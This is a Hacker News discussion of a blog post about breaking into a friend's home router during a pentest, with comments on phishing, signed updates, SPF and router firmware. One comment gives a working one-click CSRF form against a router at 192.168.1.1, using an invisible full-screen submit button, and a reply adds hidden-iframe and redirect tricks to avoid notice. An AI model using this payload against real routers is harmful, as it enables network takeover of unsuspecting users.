
How I Hacked a Router - jackpea
http://disconnected.io/2014/03/18/how-i-hacked-your-router/
======
ushi
Interesting read. On thing i do not understand is why software
updates/packages are still not cryptographically signed. It's a common thing
on Linux. Notepad++ provides checksums[0] for their packages - so (i assume)
they are actually aware of the problem.

[0] [http://sourceforge.net/p/notepad-
plus/discussion/1290588](http://sourceforge.net/p/notepad-
plus/discussion/1290588)

~~~
revelation
It's common on Linux because they use package managers where you only have to
implement that functionality once. Every PoS app on Windows and OSX has its
own update process, which mostly is just downloading and running the new setup
binary.

This happens even with software where you would think the manufacturer is
aware of this kind of problem. 1Password downloaded updates over HTTP for a
long time, then switched to HTTPS and failed to check certificates. When they
finally started to check if binaries are signed (Windows provides for that),
they didn't change keys so you could downgrade to a previous version that
didn't. That is just one application.

~~~
kalleboo
> Every PoS app on Windows and OSX has its own update process, which mostly is
> just downloading and running the new setup binary.

Most OS X apps use either the Mac App Store, which signs everything, or
Sparkle[0], which last time I used it made it really hard to use it without
signing things. It's only stuff from big vendors like Adobe and Microsoft who
do custom stuff you can't really trust.

[0] [http://sparkle.andymatuschak.org](http://sparkle.andymatuschak.org)

------
jlgaddis
While this is an interesting article and this is certainly feasible, I'm left
with the opinion that this is fiction and didn't actually happen.

~~~
sillysaurus3
Would anyone give a more in-depth comment regarding why this didn't happen?

~~~
EvanAnderson
I find it hard to believe that an infosec professional would click a link in
an email. Anybody who has ever run an phishing campaign as part of a pentest
wouldn't. I only moonlight in the infosec industry, but I know that the Right
Thing, upon receiving an unsolicited notification email from a website
("Friend" request, LinkedIn connection requests, "Track a package", etc) is to
visit the site in your browser manually, versus clicking some link in an email
that could likely be bogus.

------
siliconc0w
Everything is feasible except the faked linkedin email - it wouldn't pass SPF
and so I'm pretty sure gmail would junk it.

~~~
thaumaturgy
Well, I was all set to explain that SPF only checks the envelope sender, not
the from: address header that is displayed to the user.

Then I decided to test it, and in fact Gmail does seem to be doing more than
that. I ran a two-line script as root from my mail server to send a message
with an envelope-sender from my domain (which has a basic SPF txt record in
its DNS) and a from: header from LinkedIn, and Gmail spit it back at my return
address a moment later saying that it smelled like spam. So, good for Gmail!

But, I don't think this is common behavior, and the article doesn't actually
say that the target has a Gmail account.

~~~
jwcrux
Sure - SPF may very well only check the envelope sender, but isn't that
usually plenty? If you can't spoof the Linkedin envelope sender, and the mail
goes to SPAM, who cares if the From: address is spoofed? The user likely won't
see it anyway.

~~~
thaumaturgy
Anybody that can run sendmail as root (or use an alternate program, or compile
their own) can spoof the envelope sender.

~~~
jwcrux
Ah, gotcha. You're saying that you sent an email with a valid envelope sender
from your domain, with only a spoofed From: address, and gmail sent it back.
If so, nice!

~~~
thaumaturgy
Yep, exactly.

------
svas
Curious how the author knew to seed the backdoor'ed Notepad++ _before_ Bill
clicked the link?

I suppose you could just serve up a fake backdoor program for every *.exe\msi
download, and remove the honeypot on the second download? The first download
would execute and maybe do nothing (or error) - prompting a second download
which led to the real thing.

~~~
lambda
In the article, he mentions using Evilgrade to do the backdooring. If you
click though the link, you can find the README, which lists a bunch of
applications that Evilgrade supports seeding backdoored versions of
[http://www.infobyte.com.ar/down/isr-evilgrade-
Readme.txt](http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt)

He likely just enabled them all, or at least enabled several which are likely
candidates for his target to download.

------
ivan_ah
Okay so OpenWRT stopped being optional now...

Any hardware recommendations for what I should look in for in a router? Is old
better than new? Any particular model that is well supported?

~~~
fiatmoney
Ubiquiti AirRouter or AirRouter HP. Almost all Ubiquiti gear works completely
transparently with OpenWRT, out of the box. In fact their stock firmware is
built on top of OpenWRT.

~~~
ivan_ah
Just wanted to thank you for the recommendation. New AirRouter is working
great. I even set the power level down because I have pretty good connection
everywhere in the house.

------
ambrop7
"It took about a week before Bill decided to upgrade notepad++ to the new
version."

Which is why I'm always wary of installing unsigned software. In such cases I
try to check some hashes some way. Obviously if the download page lists them I
check against those, but in most cases it's insufficient because that page is
not HTTPS. So I always help myself with google, both by googling the filename
to find some pages listing a hash, and by googling my own hash (note that
Google is accessed with HTTPS).

~~~
why-el
I didn't understand which hashes you are talking about. Do installs usually
provide a checksum or? I have not found any that do, or maybe I just ignore
it.

~~~
ambrop7
The hashes of downloaded files, computed locally. E.g. with 'sha1sum' command
or Microsoft's 'fciv'.

Suppose I download Putty and am unsure of whether it's the real thing or
whether it's a Trojan, e.g. due to someone having hacked my router. I compute
the hash of the file and google it:
[http://lmgtfy.com/?q=44ac2504a02af84ee142adaa3ea70b868185906...](http://lmgtfy.com/?q=44ac2504a02af84ee142adaa3ea70b868185906f)
. I find many sites saying that's putty.exe. If I didn't, I'd be very
suspicious.

------
refurb
I'm curious how the email attack worked, don't most web-based email services
flag emails that come from one domain, but contain a link to another?

~~~
meowface
Yes, they should. I'd be curious to hear more details about that.

I'd also like to know what domain was used for phishing, since you would think
an infosec guy would either hover over the button/link before clicking, or get
suspicious when he sees his browser load a site that isn't linkedin.com before
redirecting.

~~~
batuhanicoz
But if you control the DNS, you can serve a fake LinkedIn from linkedin.com.
Can't do https though.

Edit: Ignore it, I forgot he didn't control the DNS at that point. So this is
invalid.

~~~
btown
Note that at that point in the attack, he had not yet gained access to the
router, so he didn't control DNS yet.

~~~
batuhanicoz
Oh yes, I missed that fact. Sorry.

------
quackerhacker
Maybe some NetSec guys could answer this please. What would happen with his
update to Notepad++? Would it still update the package?

Even if the target set his computer to auto-update (or something that did not
require admin authentication), wouldn't he have some type of notion that
something went wrong during his update?

With the target being an InfoSec guy, I would've imagined he would at least be
running some type of network monitoring, like wireshark or little snitch,
_ESP_ on his personal computer. Wouldn't he have to authorize the outgoing
packets?

Sorry, if I come off analytical to the story...it's a great read...I just want
to make sure my networks are locked down. I've even went as far as dedicated
networks for my server and home usage, and preventing internal ip addresses
from communicating to each other (sucks for airplay).

~~~
ma2rten
_Wouldn 't he have some type of notion that something went wrong during his
update?_

There is a way of injecting your code into an existing executable so that the
executable still works like it did before. Basically your code gets called
first and than the original program entry point gets called.

 _Wouldn 't he have to authorize the outgoing packets?_

He might have updated this Notepad++ on purpose? He obviously did not know his
router was compromised.

~~~
quackerhacker
Thank you. You helped me realized that even if the target had wireshark or
little snitch, the router was acting as the MITM since the packets would
piggyback on outgoing requests that appeared normal cause of the router's DNS
settings.

I was trying to figure out how he had the key logger sending out it's packets.

------
userbinator
tl;dr: Social engineering won. It was over the moment he got tricked into
clicking on a link in an email.

~~~
frozenport
So we live in a world where you can browse to a page and have your network
compromised? Consider reading the story.

~~~
userbinator
I did. He couldn't attack the router from outside, he had to get his victim to
do it from within the network.

~~~
teacup50
No, he just had to get the victim to visit a web page he controlled. That's
barely social engineering.

------
pcunite
Sweet story ... and another vote for MikroTik routers for personal use.

~~~
jlgaddis
I'd go along with that, assuming that RouterOS is replaced by OpenWRT or
FreeBSD.

~~~
krick
Do you think configuring OS for your router manually would leave less chance
for it to be broken? I suspect I'd leave more holes setting up all the stuff
myself, than relying on MikroTik folks knowledge.

Besides, are there some step-by-step guides/checklists that would help build
secure environment for your router/PC?

~~~
jlgaddis
I should probably say that I have a dislike of (and am biased against)
MikroTik because of their disregard of the GPL. For the price, though, I think
the hardware is generally pretty decent.

Anyway, I don't feel real confident in the security of the RouterOS software
although I don't have any hard or articulable reasons for that. It's just a
"gut feeling", I suppose.

I do have much more confidence in both OpenWRT and FreeBSD. If you're just
using the device as a home router/firewall, you don't really need many (if
any) daemons running and exposed so the attack surface is pretty minimalized.
My own router at home came with RouterOS on it (although it's not MikroTik
hardware) but I replaced it with OpenBSD.

------
k_os
I guess it's a good thing I have my laptop setup to use google's dns no matter
what network i'm on.

~~~
beagle3
Not really. Control of the router (of the kind he describes) can set up
routing in such a way that it still goes to system under his control. It's
easiest if he can get a shell with access to (e.g.) iptables, but even without
a shell, it's possible to set up routing to do that.

------
prez
Doesn't the target need to have an active router admin session for the CSRF to
work?

Unless I'm missing something...

~~~
pizzeys
I don't know about this specific bug, but there have been consumer routers
bugs before (Netgear specifically) where not only were they vulnerable to
CSRF, but authentication bypass at the same time if the request was crafted
carefully.

------
yp_master
How about using Soekris or Alix for a router instead of Netgear?

------
frozenport
If you use a different firmware, would your problem be fixed?

------
icebraining
One more reason to use NoScript - it would have made the CSRF significantly
harder to pull off. And a reason to use an OS with a proper package manager,
of course ;)

~~~
joev_
Not really. Depending on the protocol CSRFs are often an easy 1-click exploit
on noscript-enabled browsers. Something like this:

    
    
        <form enctype='text/plain' method=post action='http://192.168.1.1/vulnerable'>
          <input type='hidden' name="<!--" value="--> <SOAP...>" />
          <input type='submit' value="submit" style="position:fixed;top:0;left:0;width:1200px;height:1200px;background:#000;opacity:0;" />
        </form>
    

Is the corresponding 1-click that works on noscript.

~~~
icebraining
Hmm, I thought ClearClick would catch that, but apparently it doesn't. That's
unnerving. Even ABE lets it through.

That said, it would still require the victim to load the fake LinkedIn page
(with the wrong domain), which is more likely to look suspicious.

And it would've loaded the router page after the POST (instead of redirecting
to LinkedIn), which would _definitively_ signal that something was wrong.

~~~
joev_
Nah, you just set target="iframe name" on the form and post into a (hidden)
iframe. Then in 2 seconds you redirect to LinkedIn. In my experience, getting
clicks from targets is easy. One simple way is to show a page with a single
link that just says "Redirecting". After a moment most users will just click
the link.

------
conchy
How much harder would this attack have been with a fully patched OSX Mavericks
target and an Apple Time Capsule router?

~~~
IgorPartola
Well, if his password was weak, easier than TFA.

I don't know about the vulnerabilities in the Time Capsule router, but from my
understanding the only router firmware even remotely worth a look in terms of
security would be OpenWRT.

~~~
conchy
My cursory search suggests that it may be pretty secure:
[http://www.cvedetails.com/vulnerability-
list/vendor_id-49/pr...](http://www.cvedetails.com/vulnerability-
list/vendor_id-49/product_id-18927/Apple-Time-Capsule.html)

but I figured I should ask this guy, sounds like he knows what he's doing.

------
zurn
This doesn't sound like a router. Maybe a home wifi ap / NAT box?

------
CodeGlitch
So why was 'Bill' \- an infosec expert running Windows?

------
tsmash
Which one do you think will happen first: This guy goes to jail, or this guy
gets a job offer?

~~~
csears
Why would he go to jail? The guy's friend asked for the pentest. There was no
"unauthorized access" involved here.

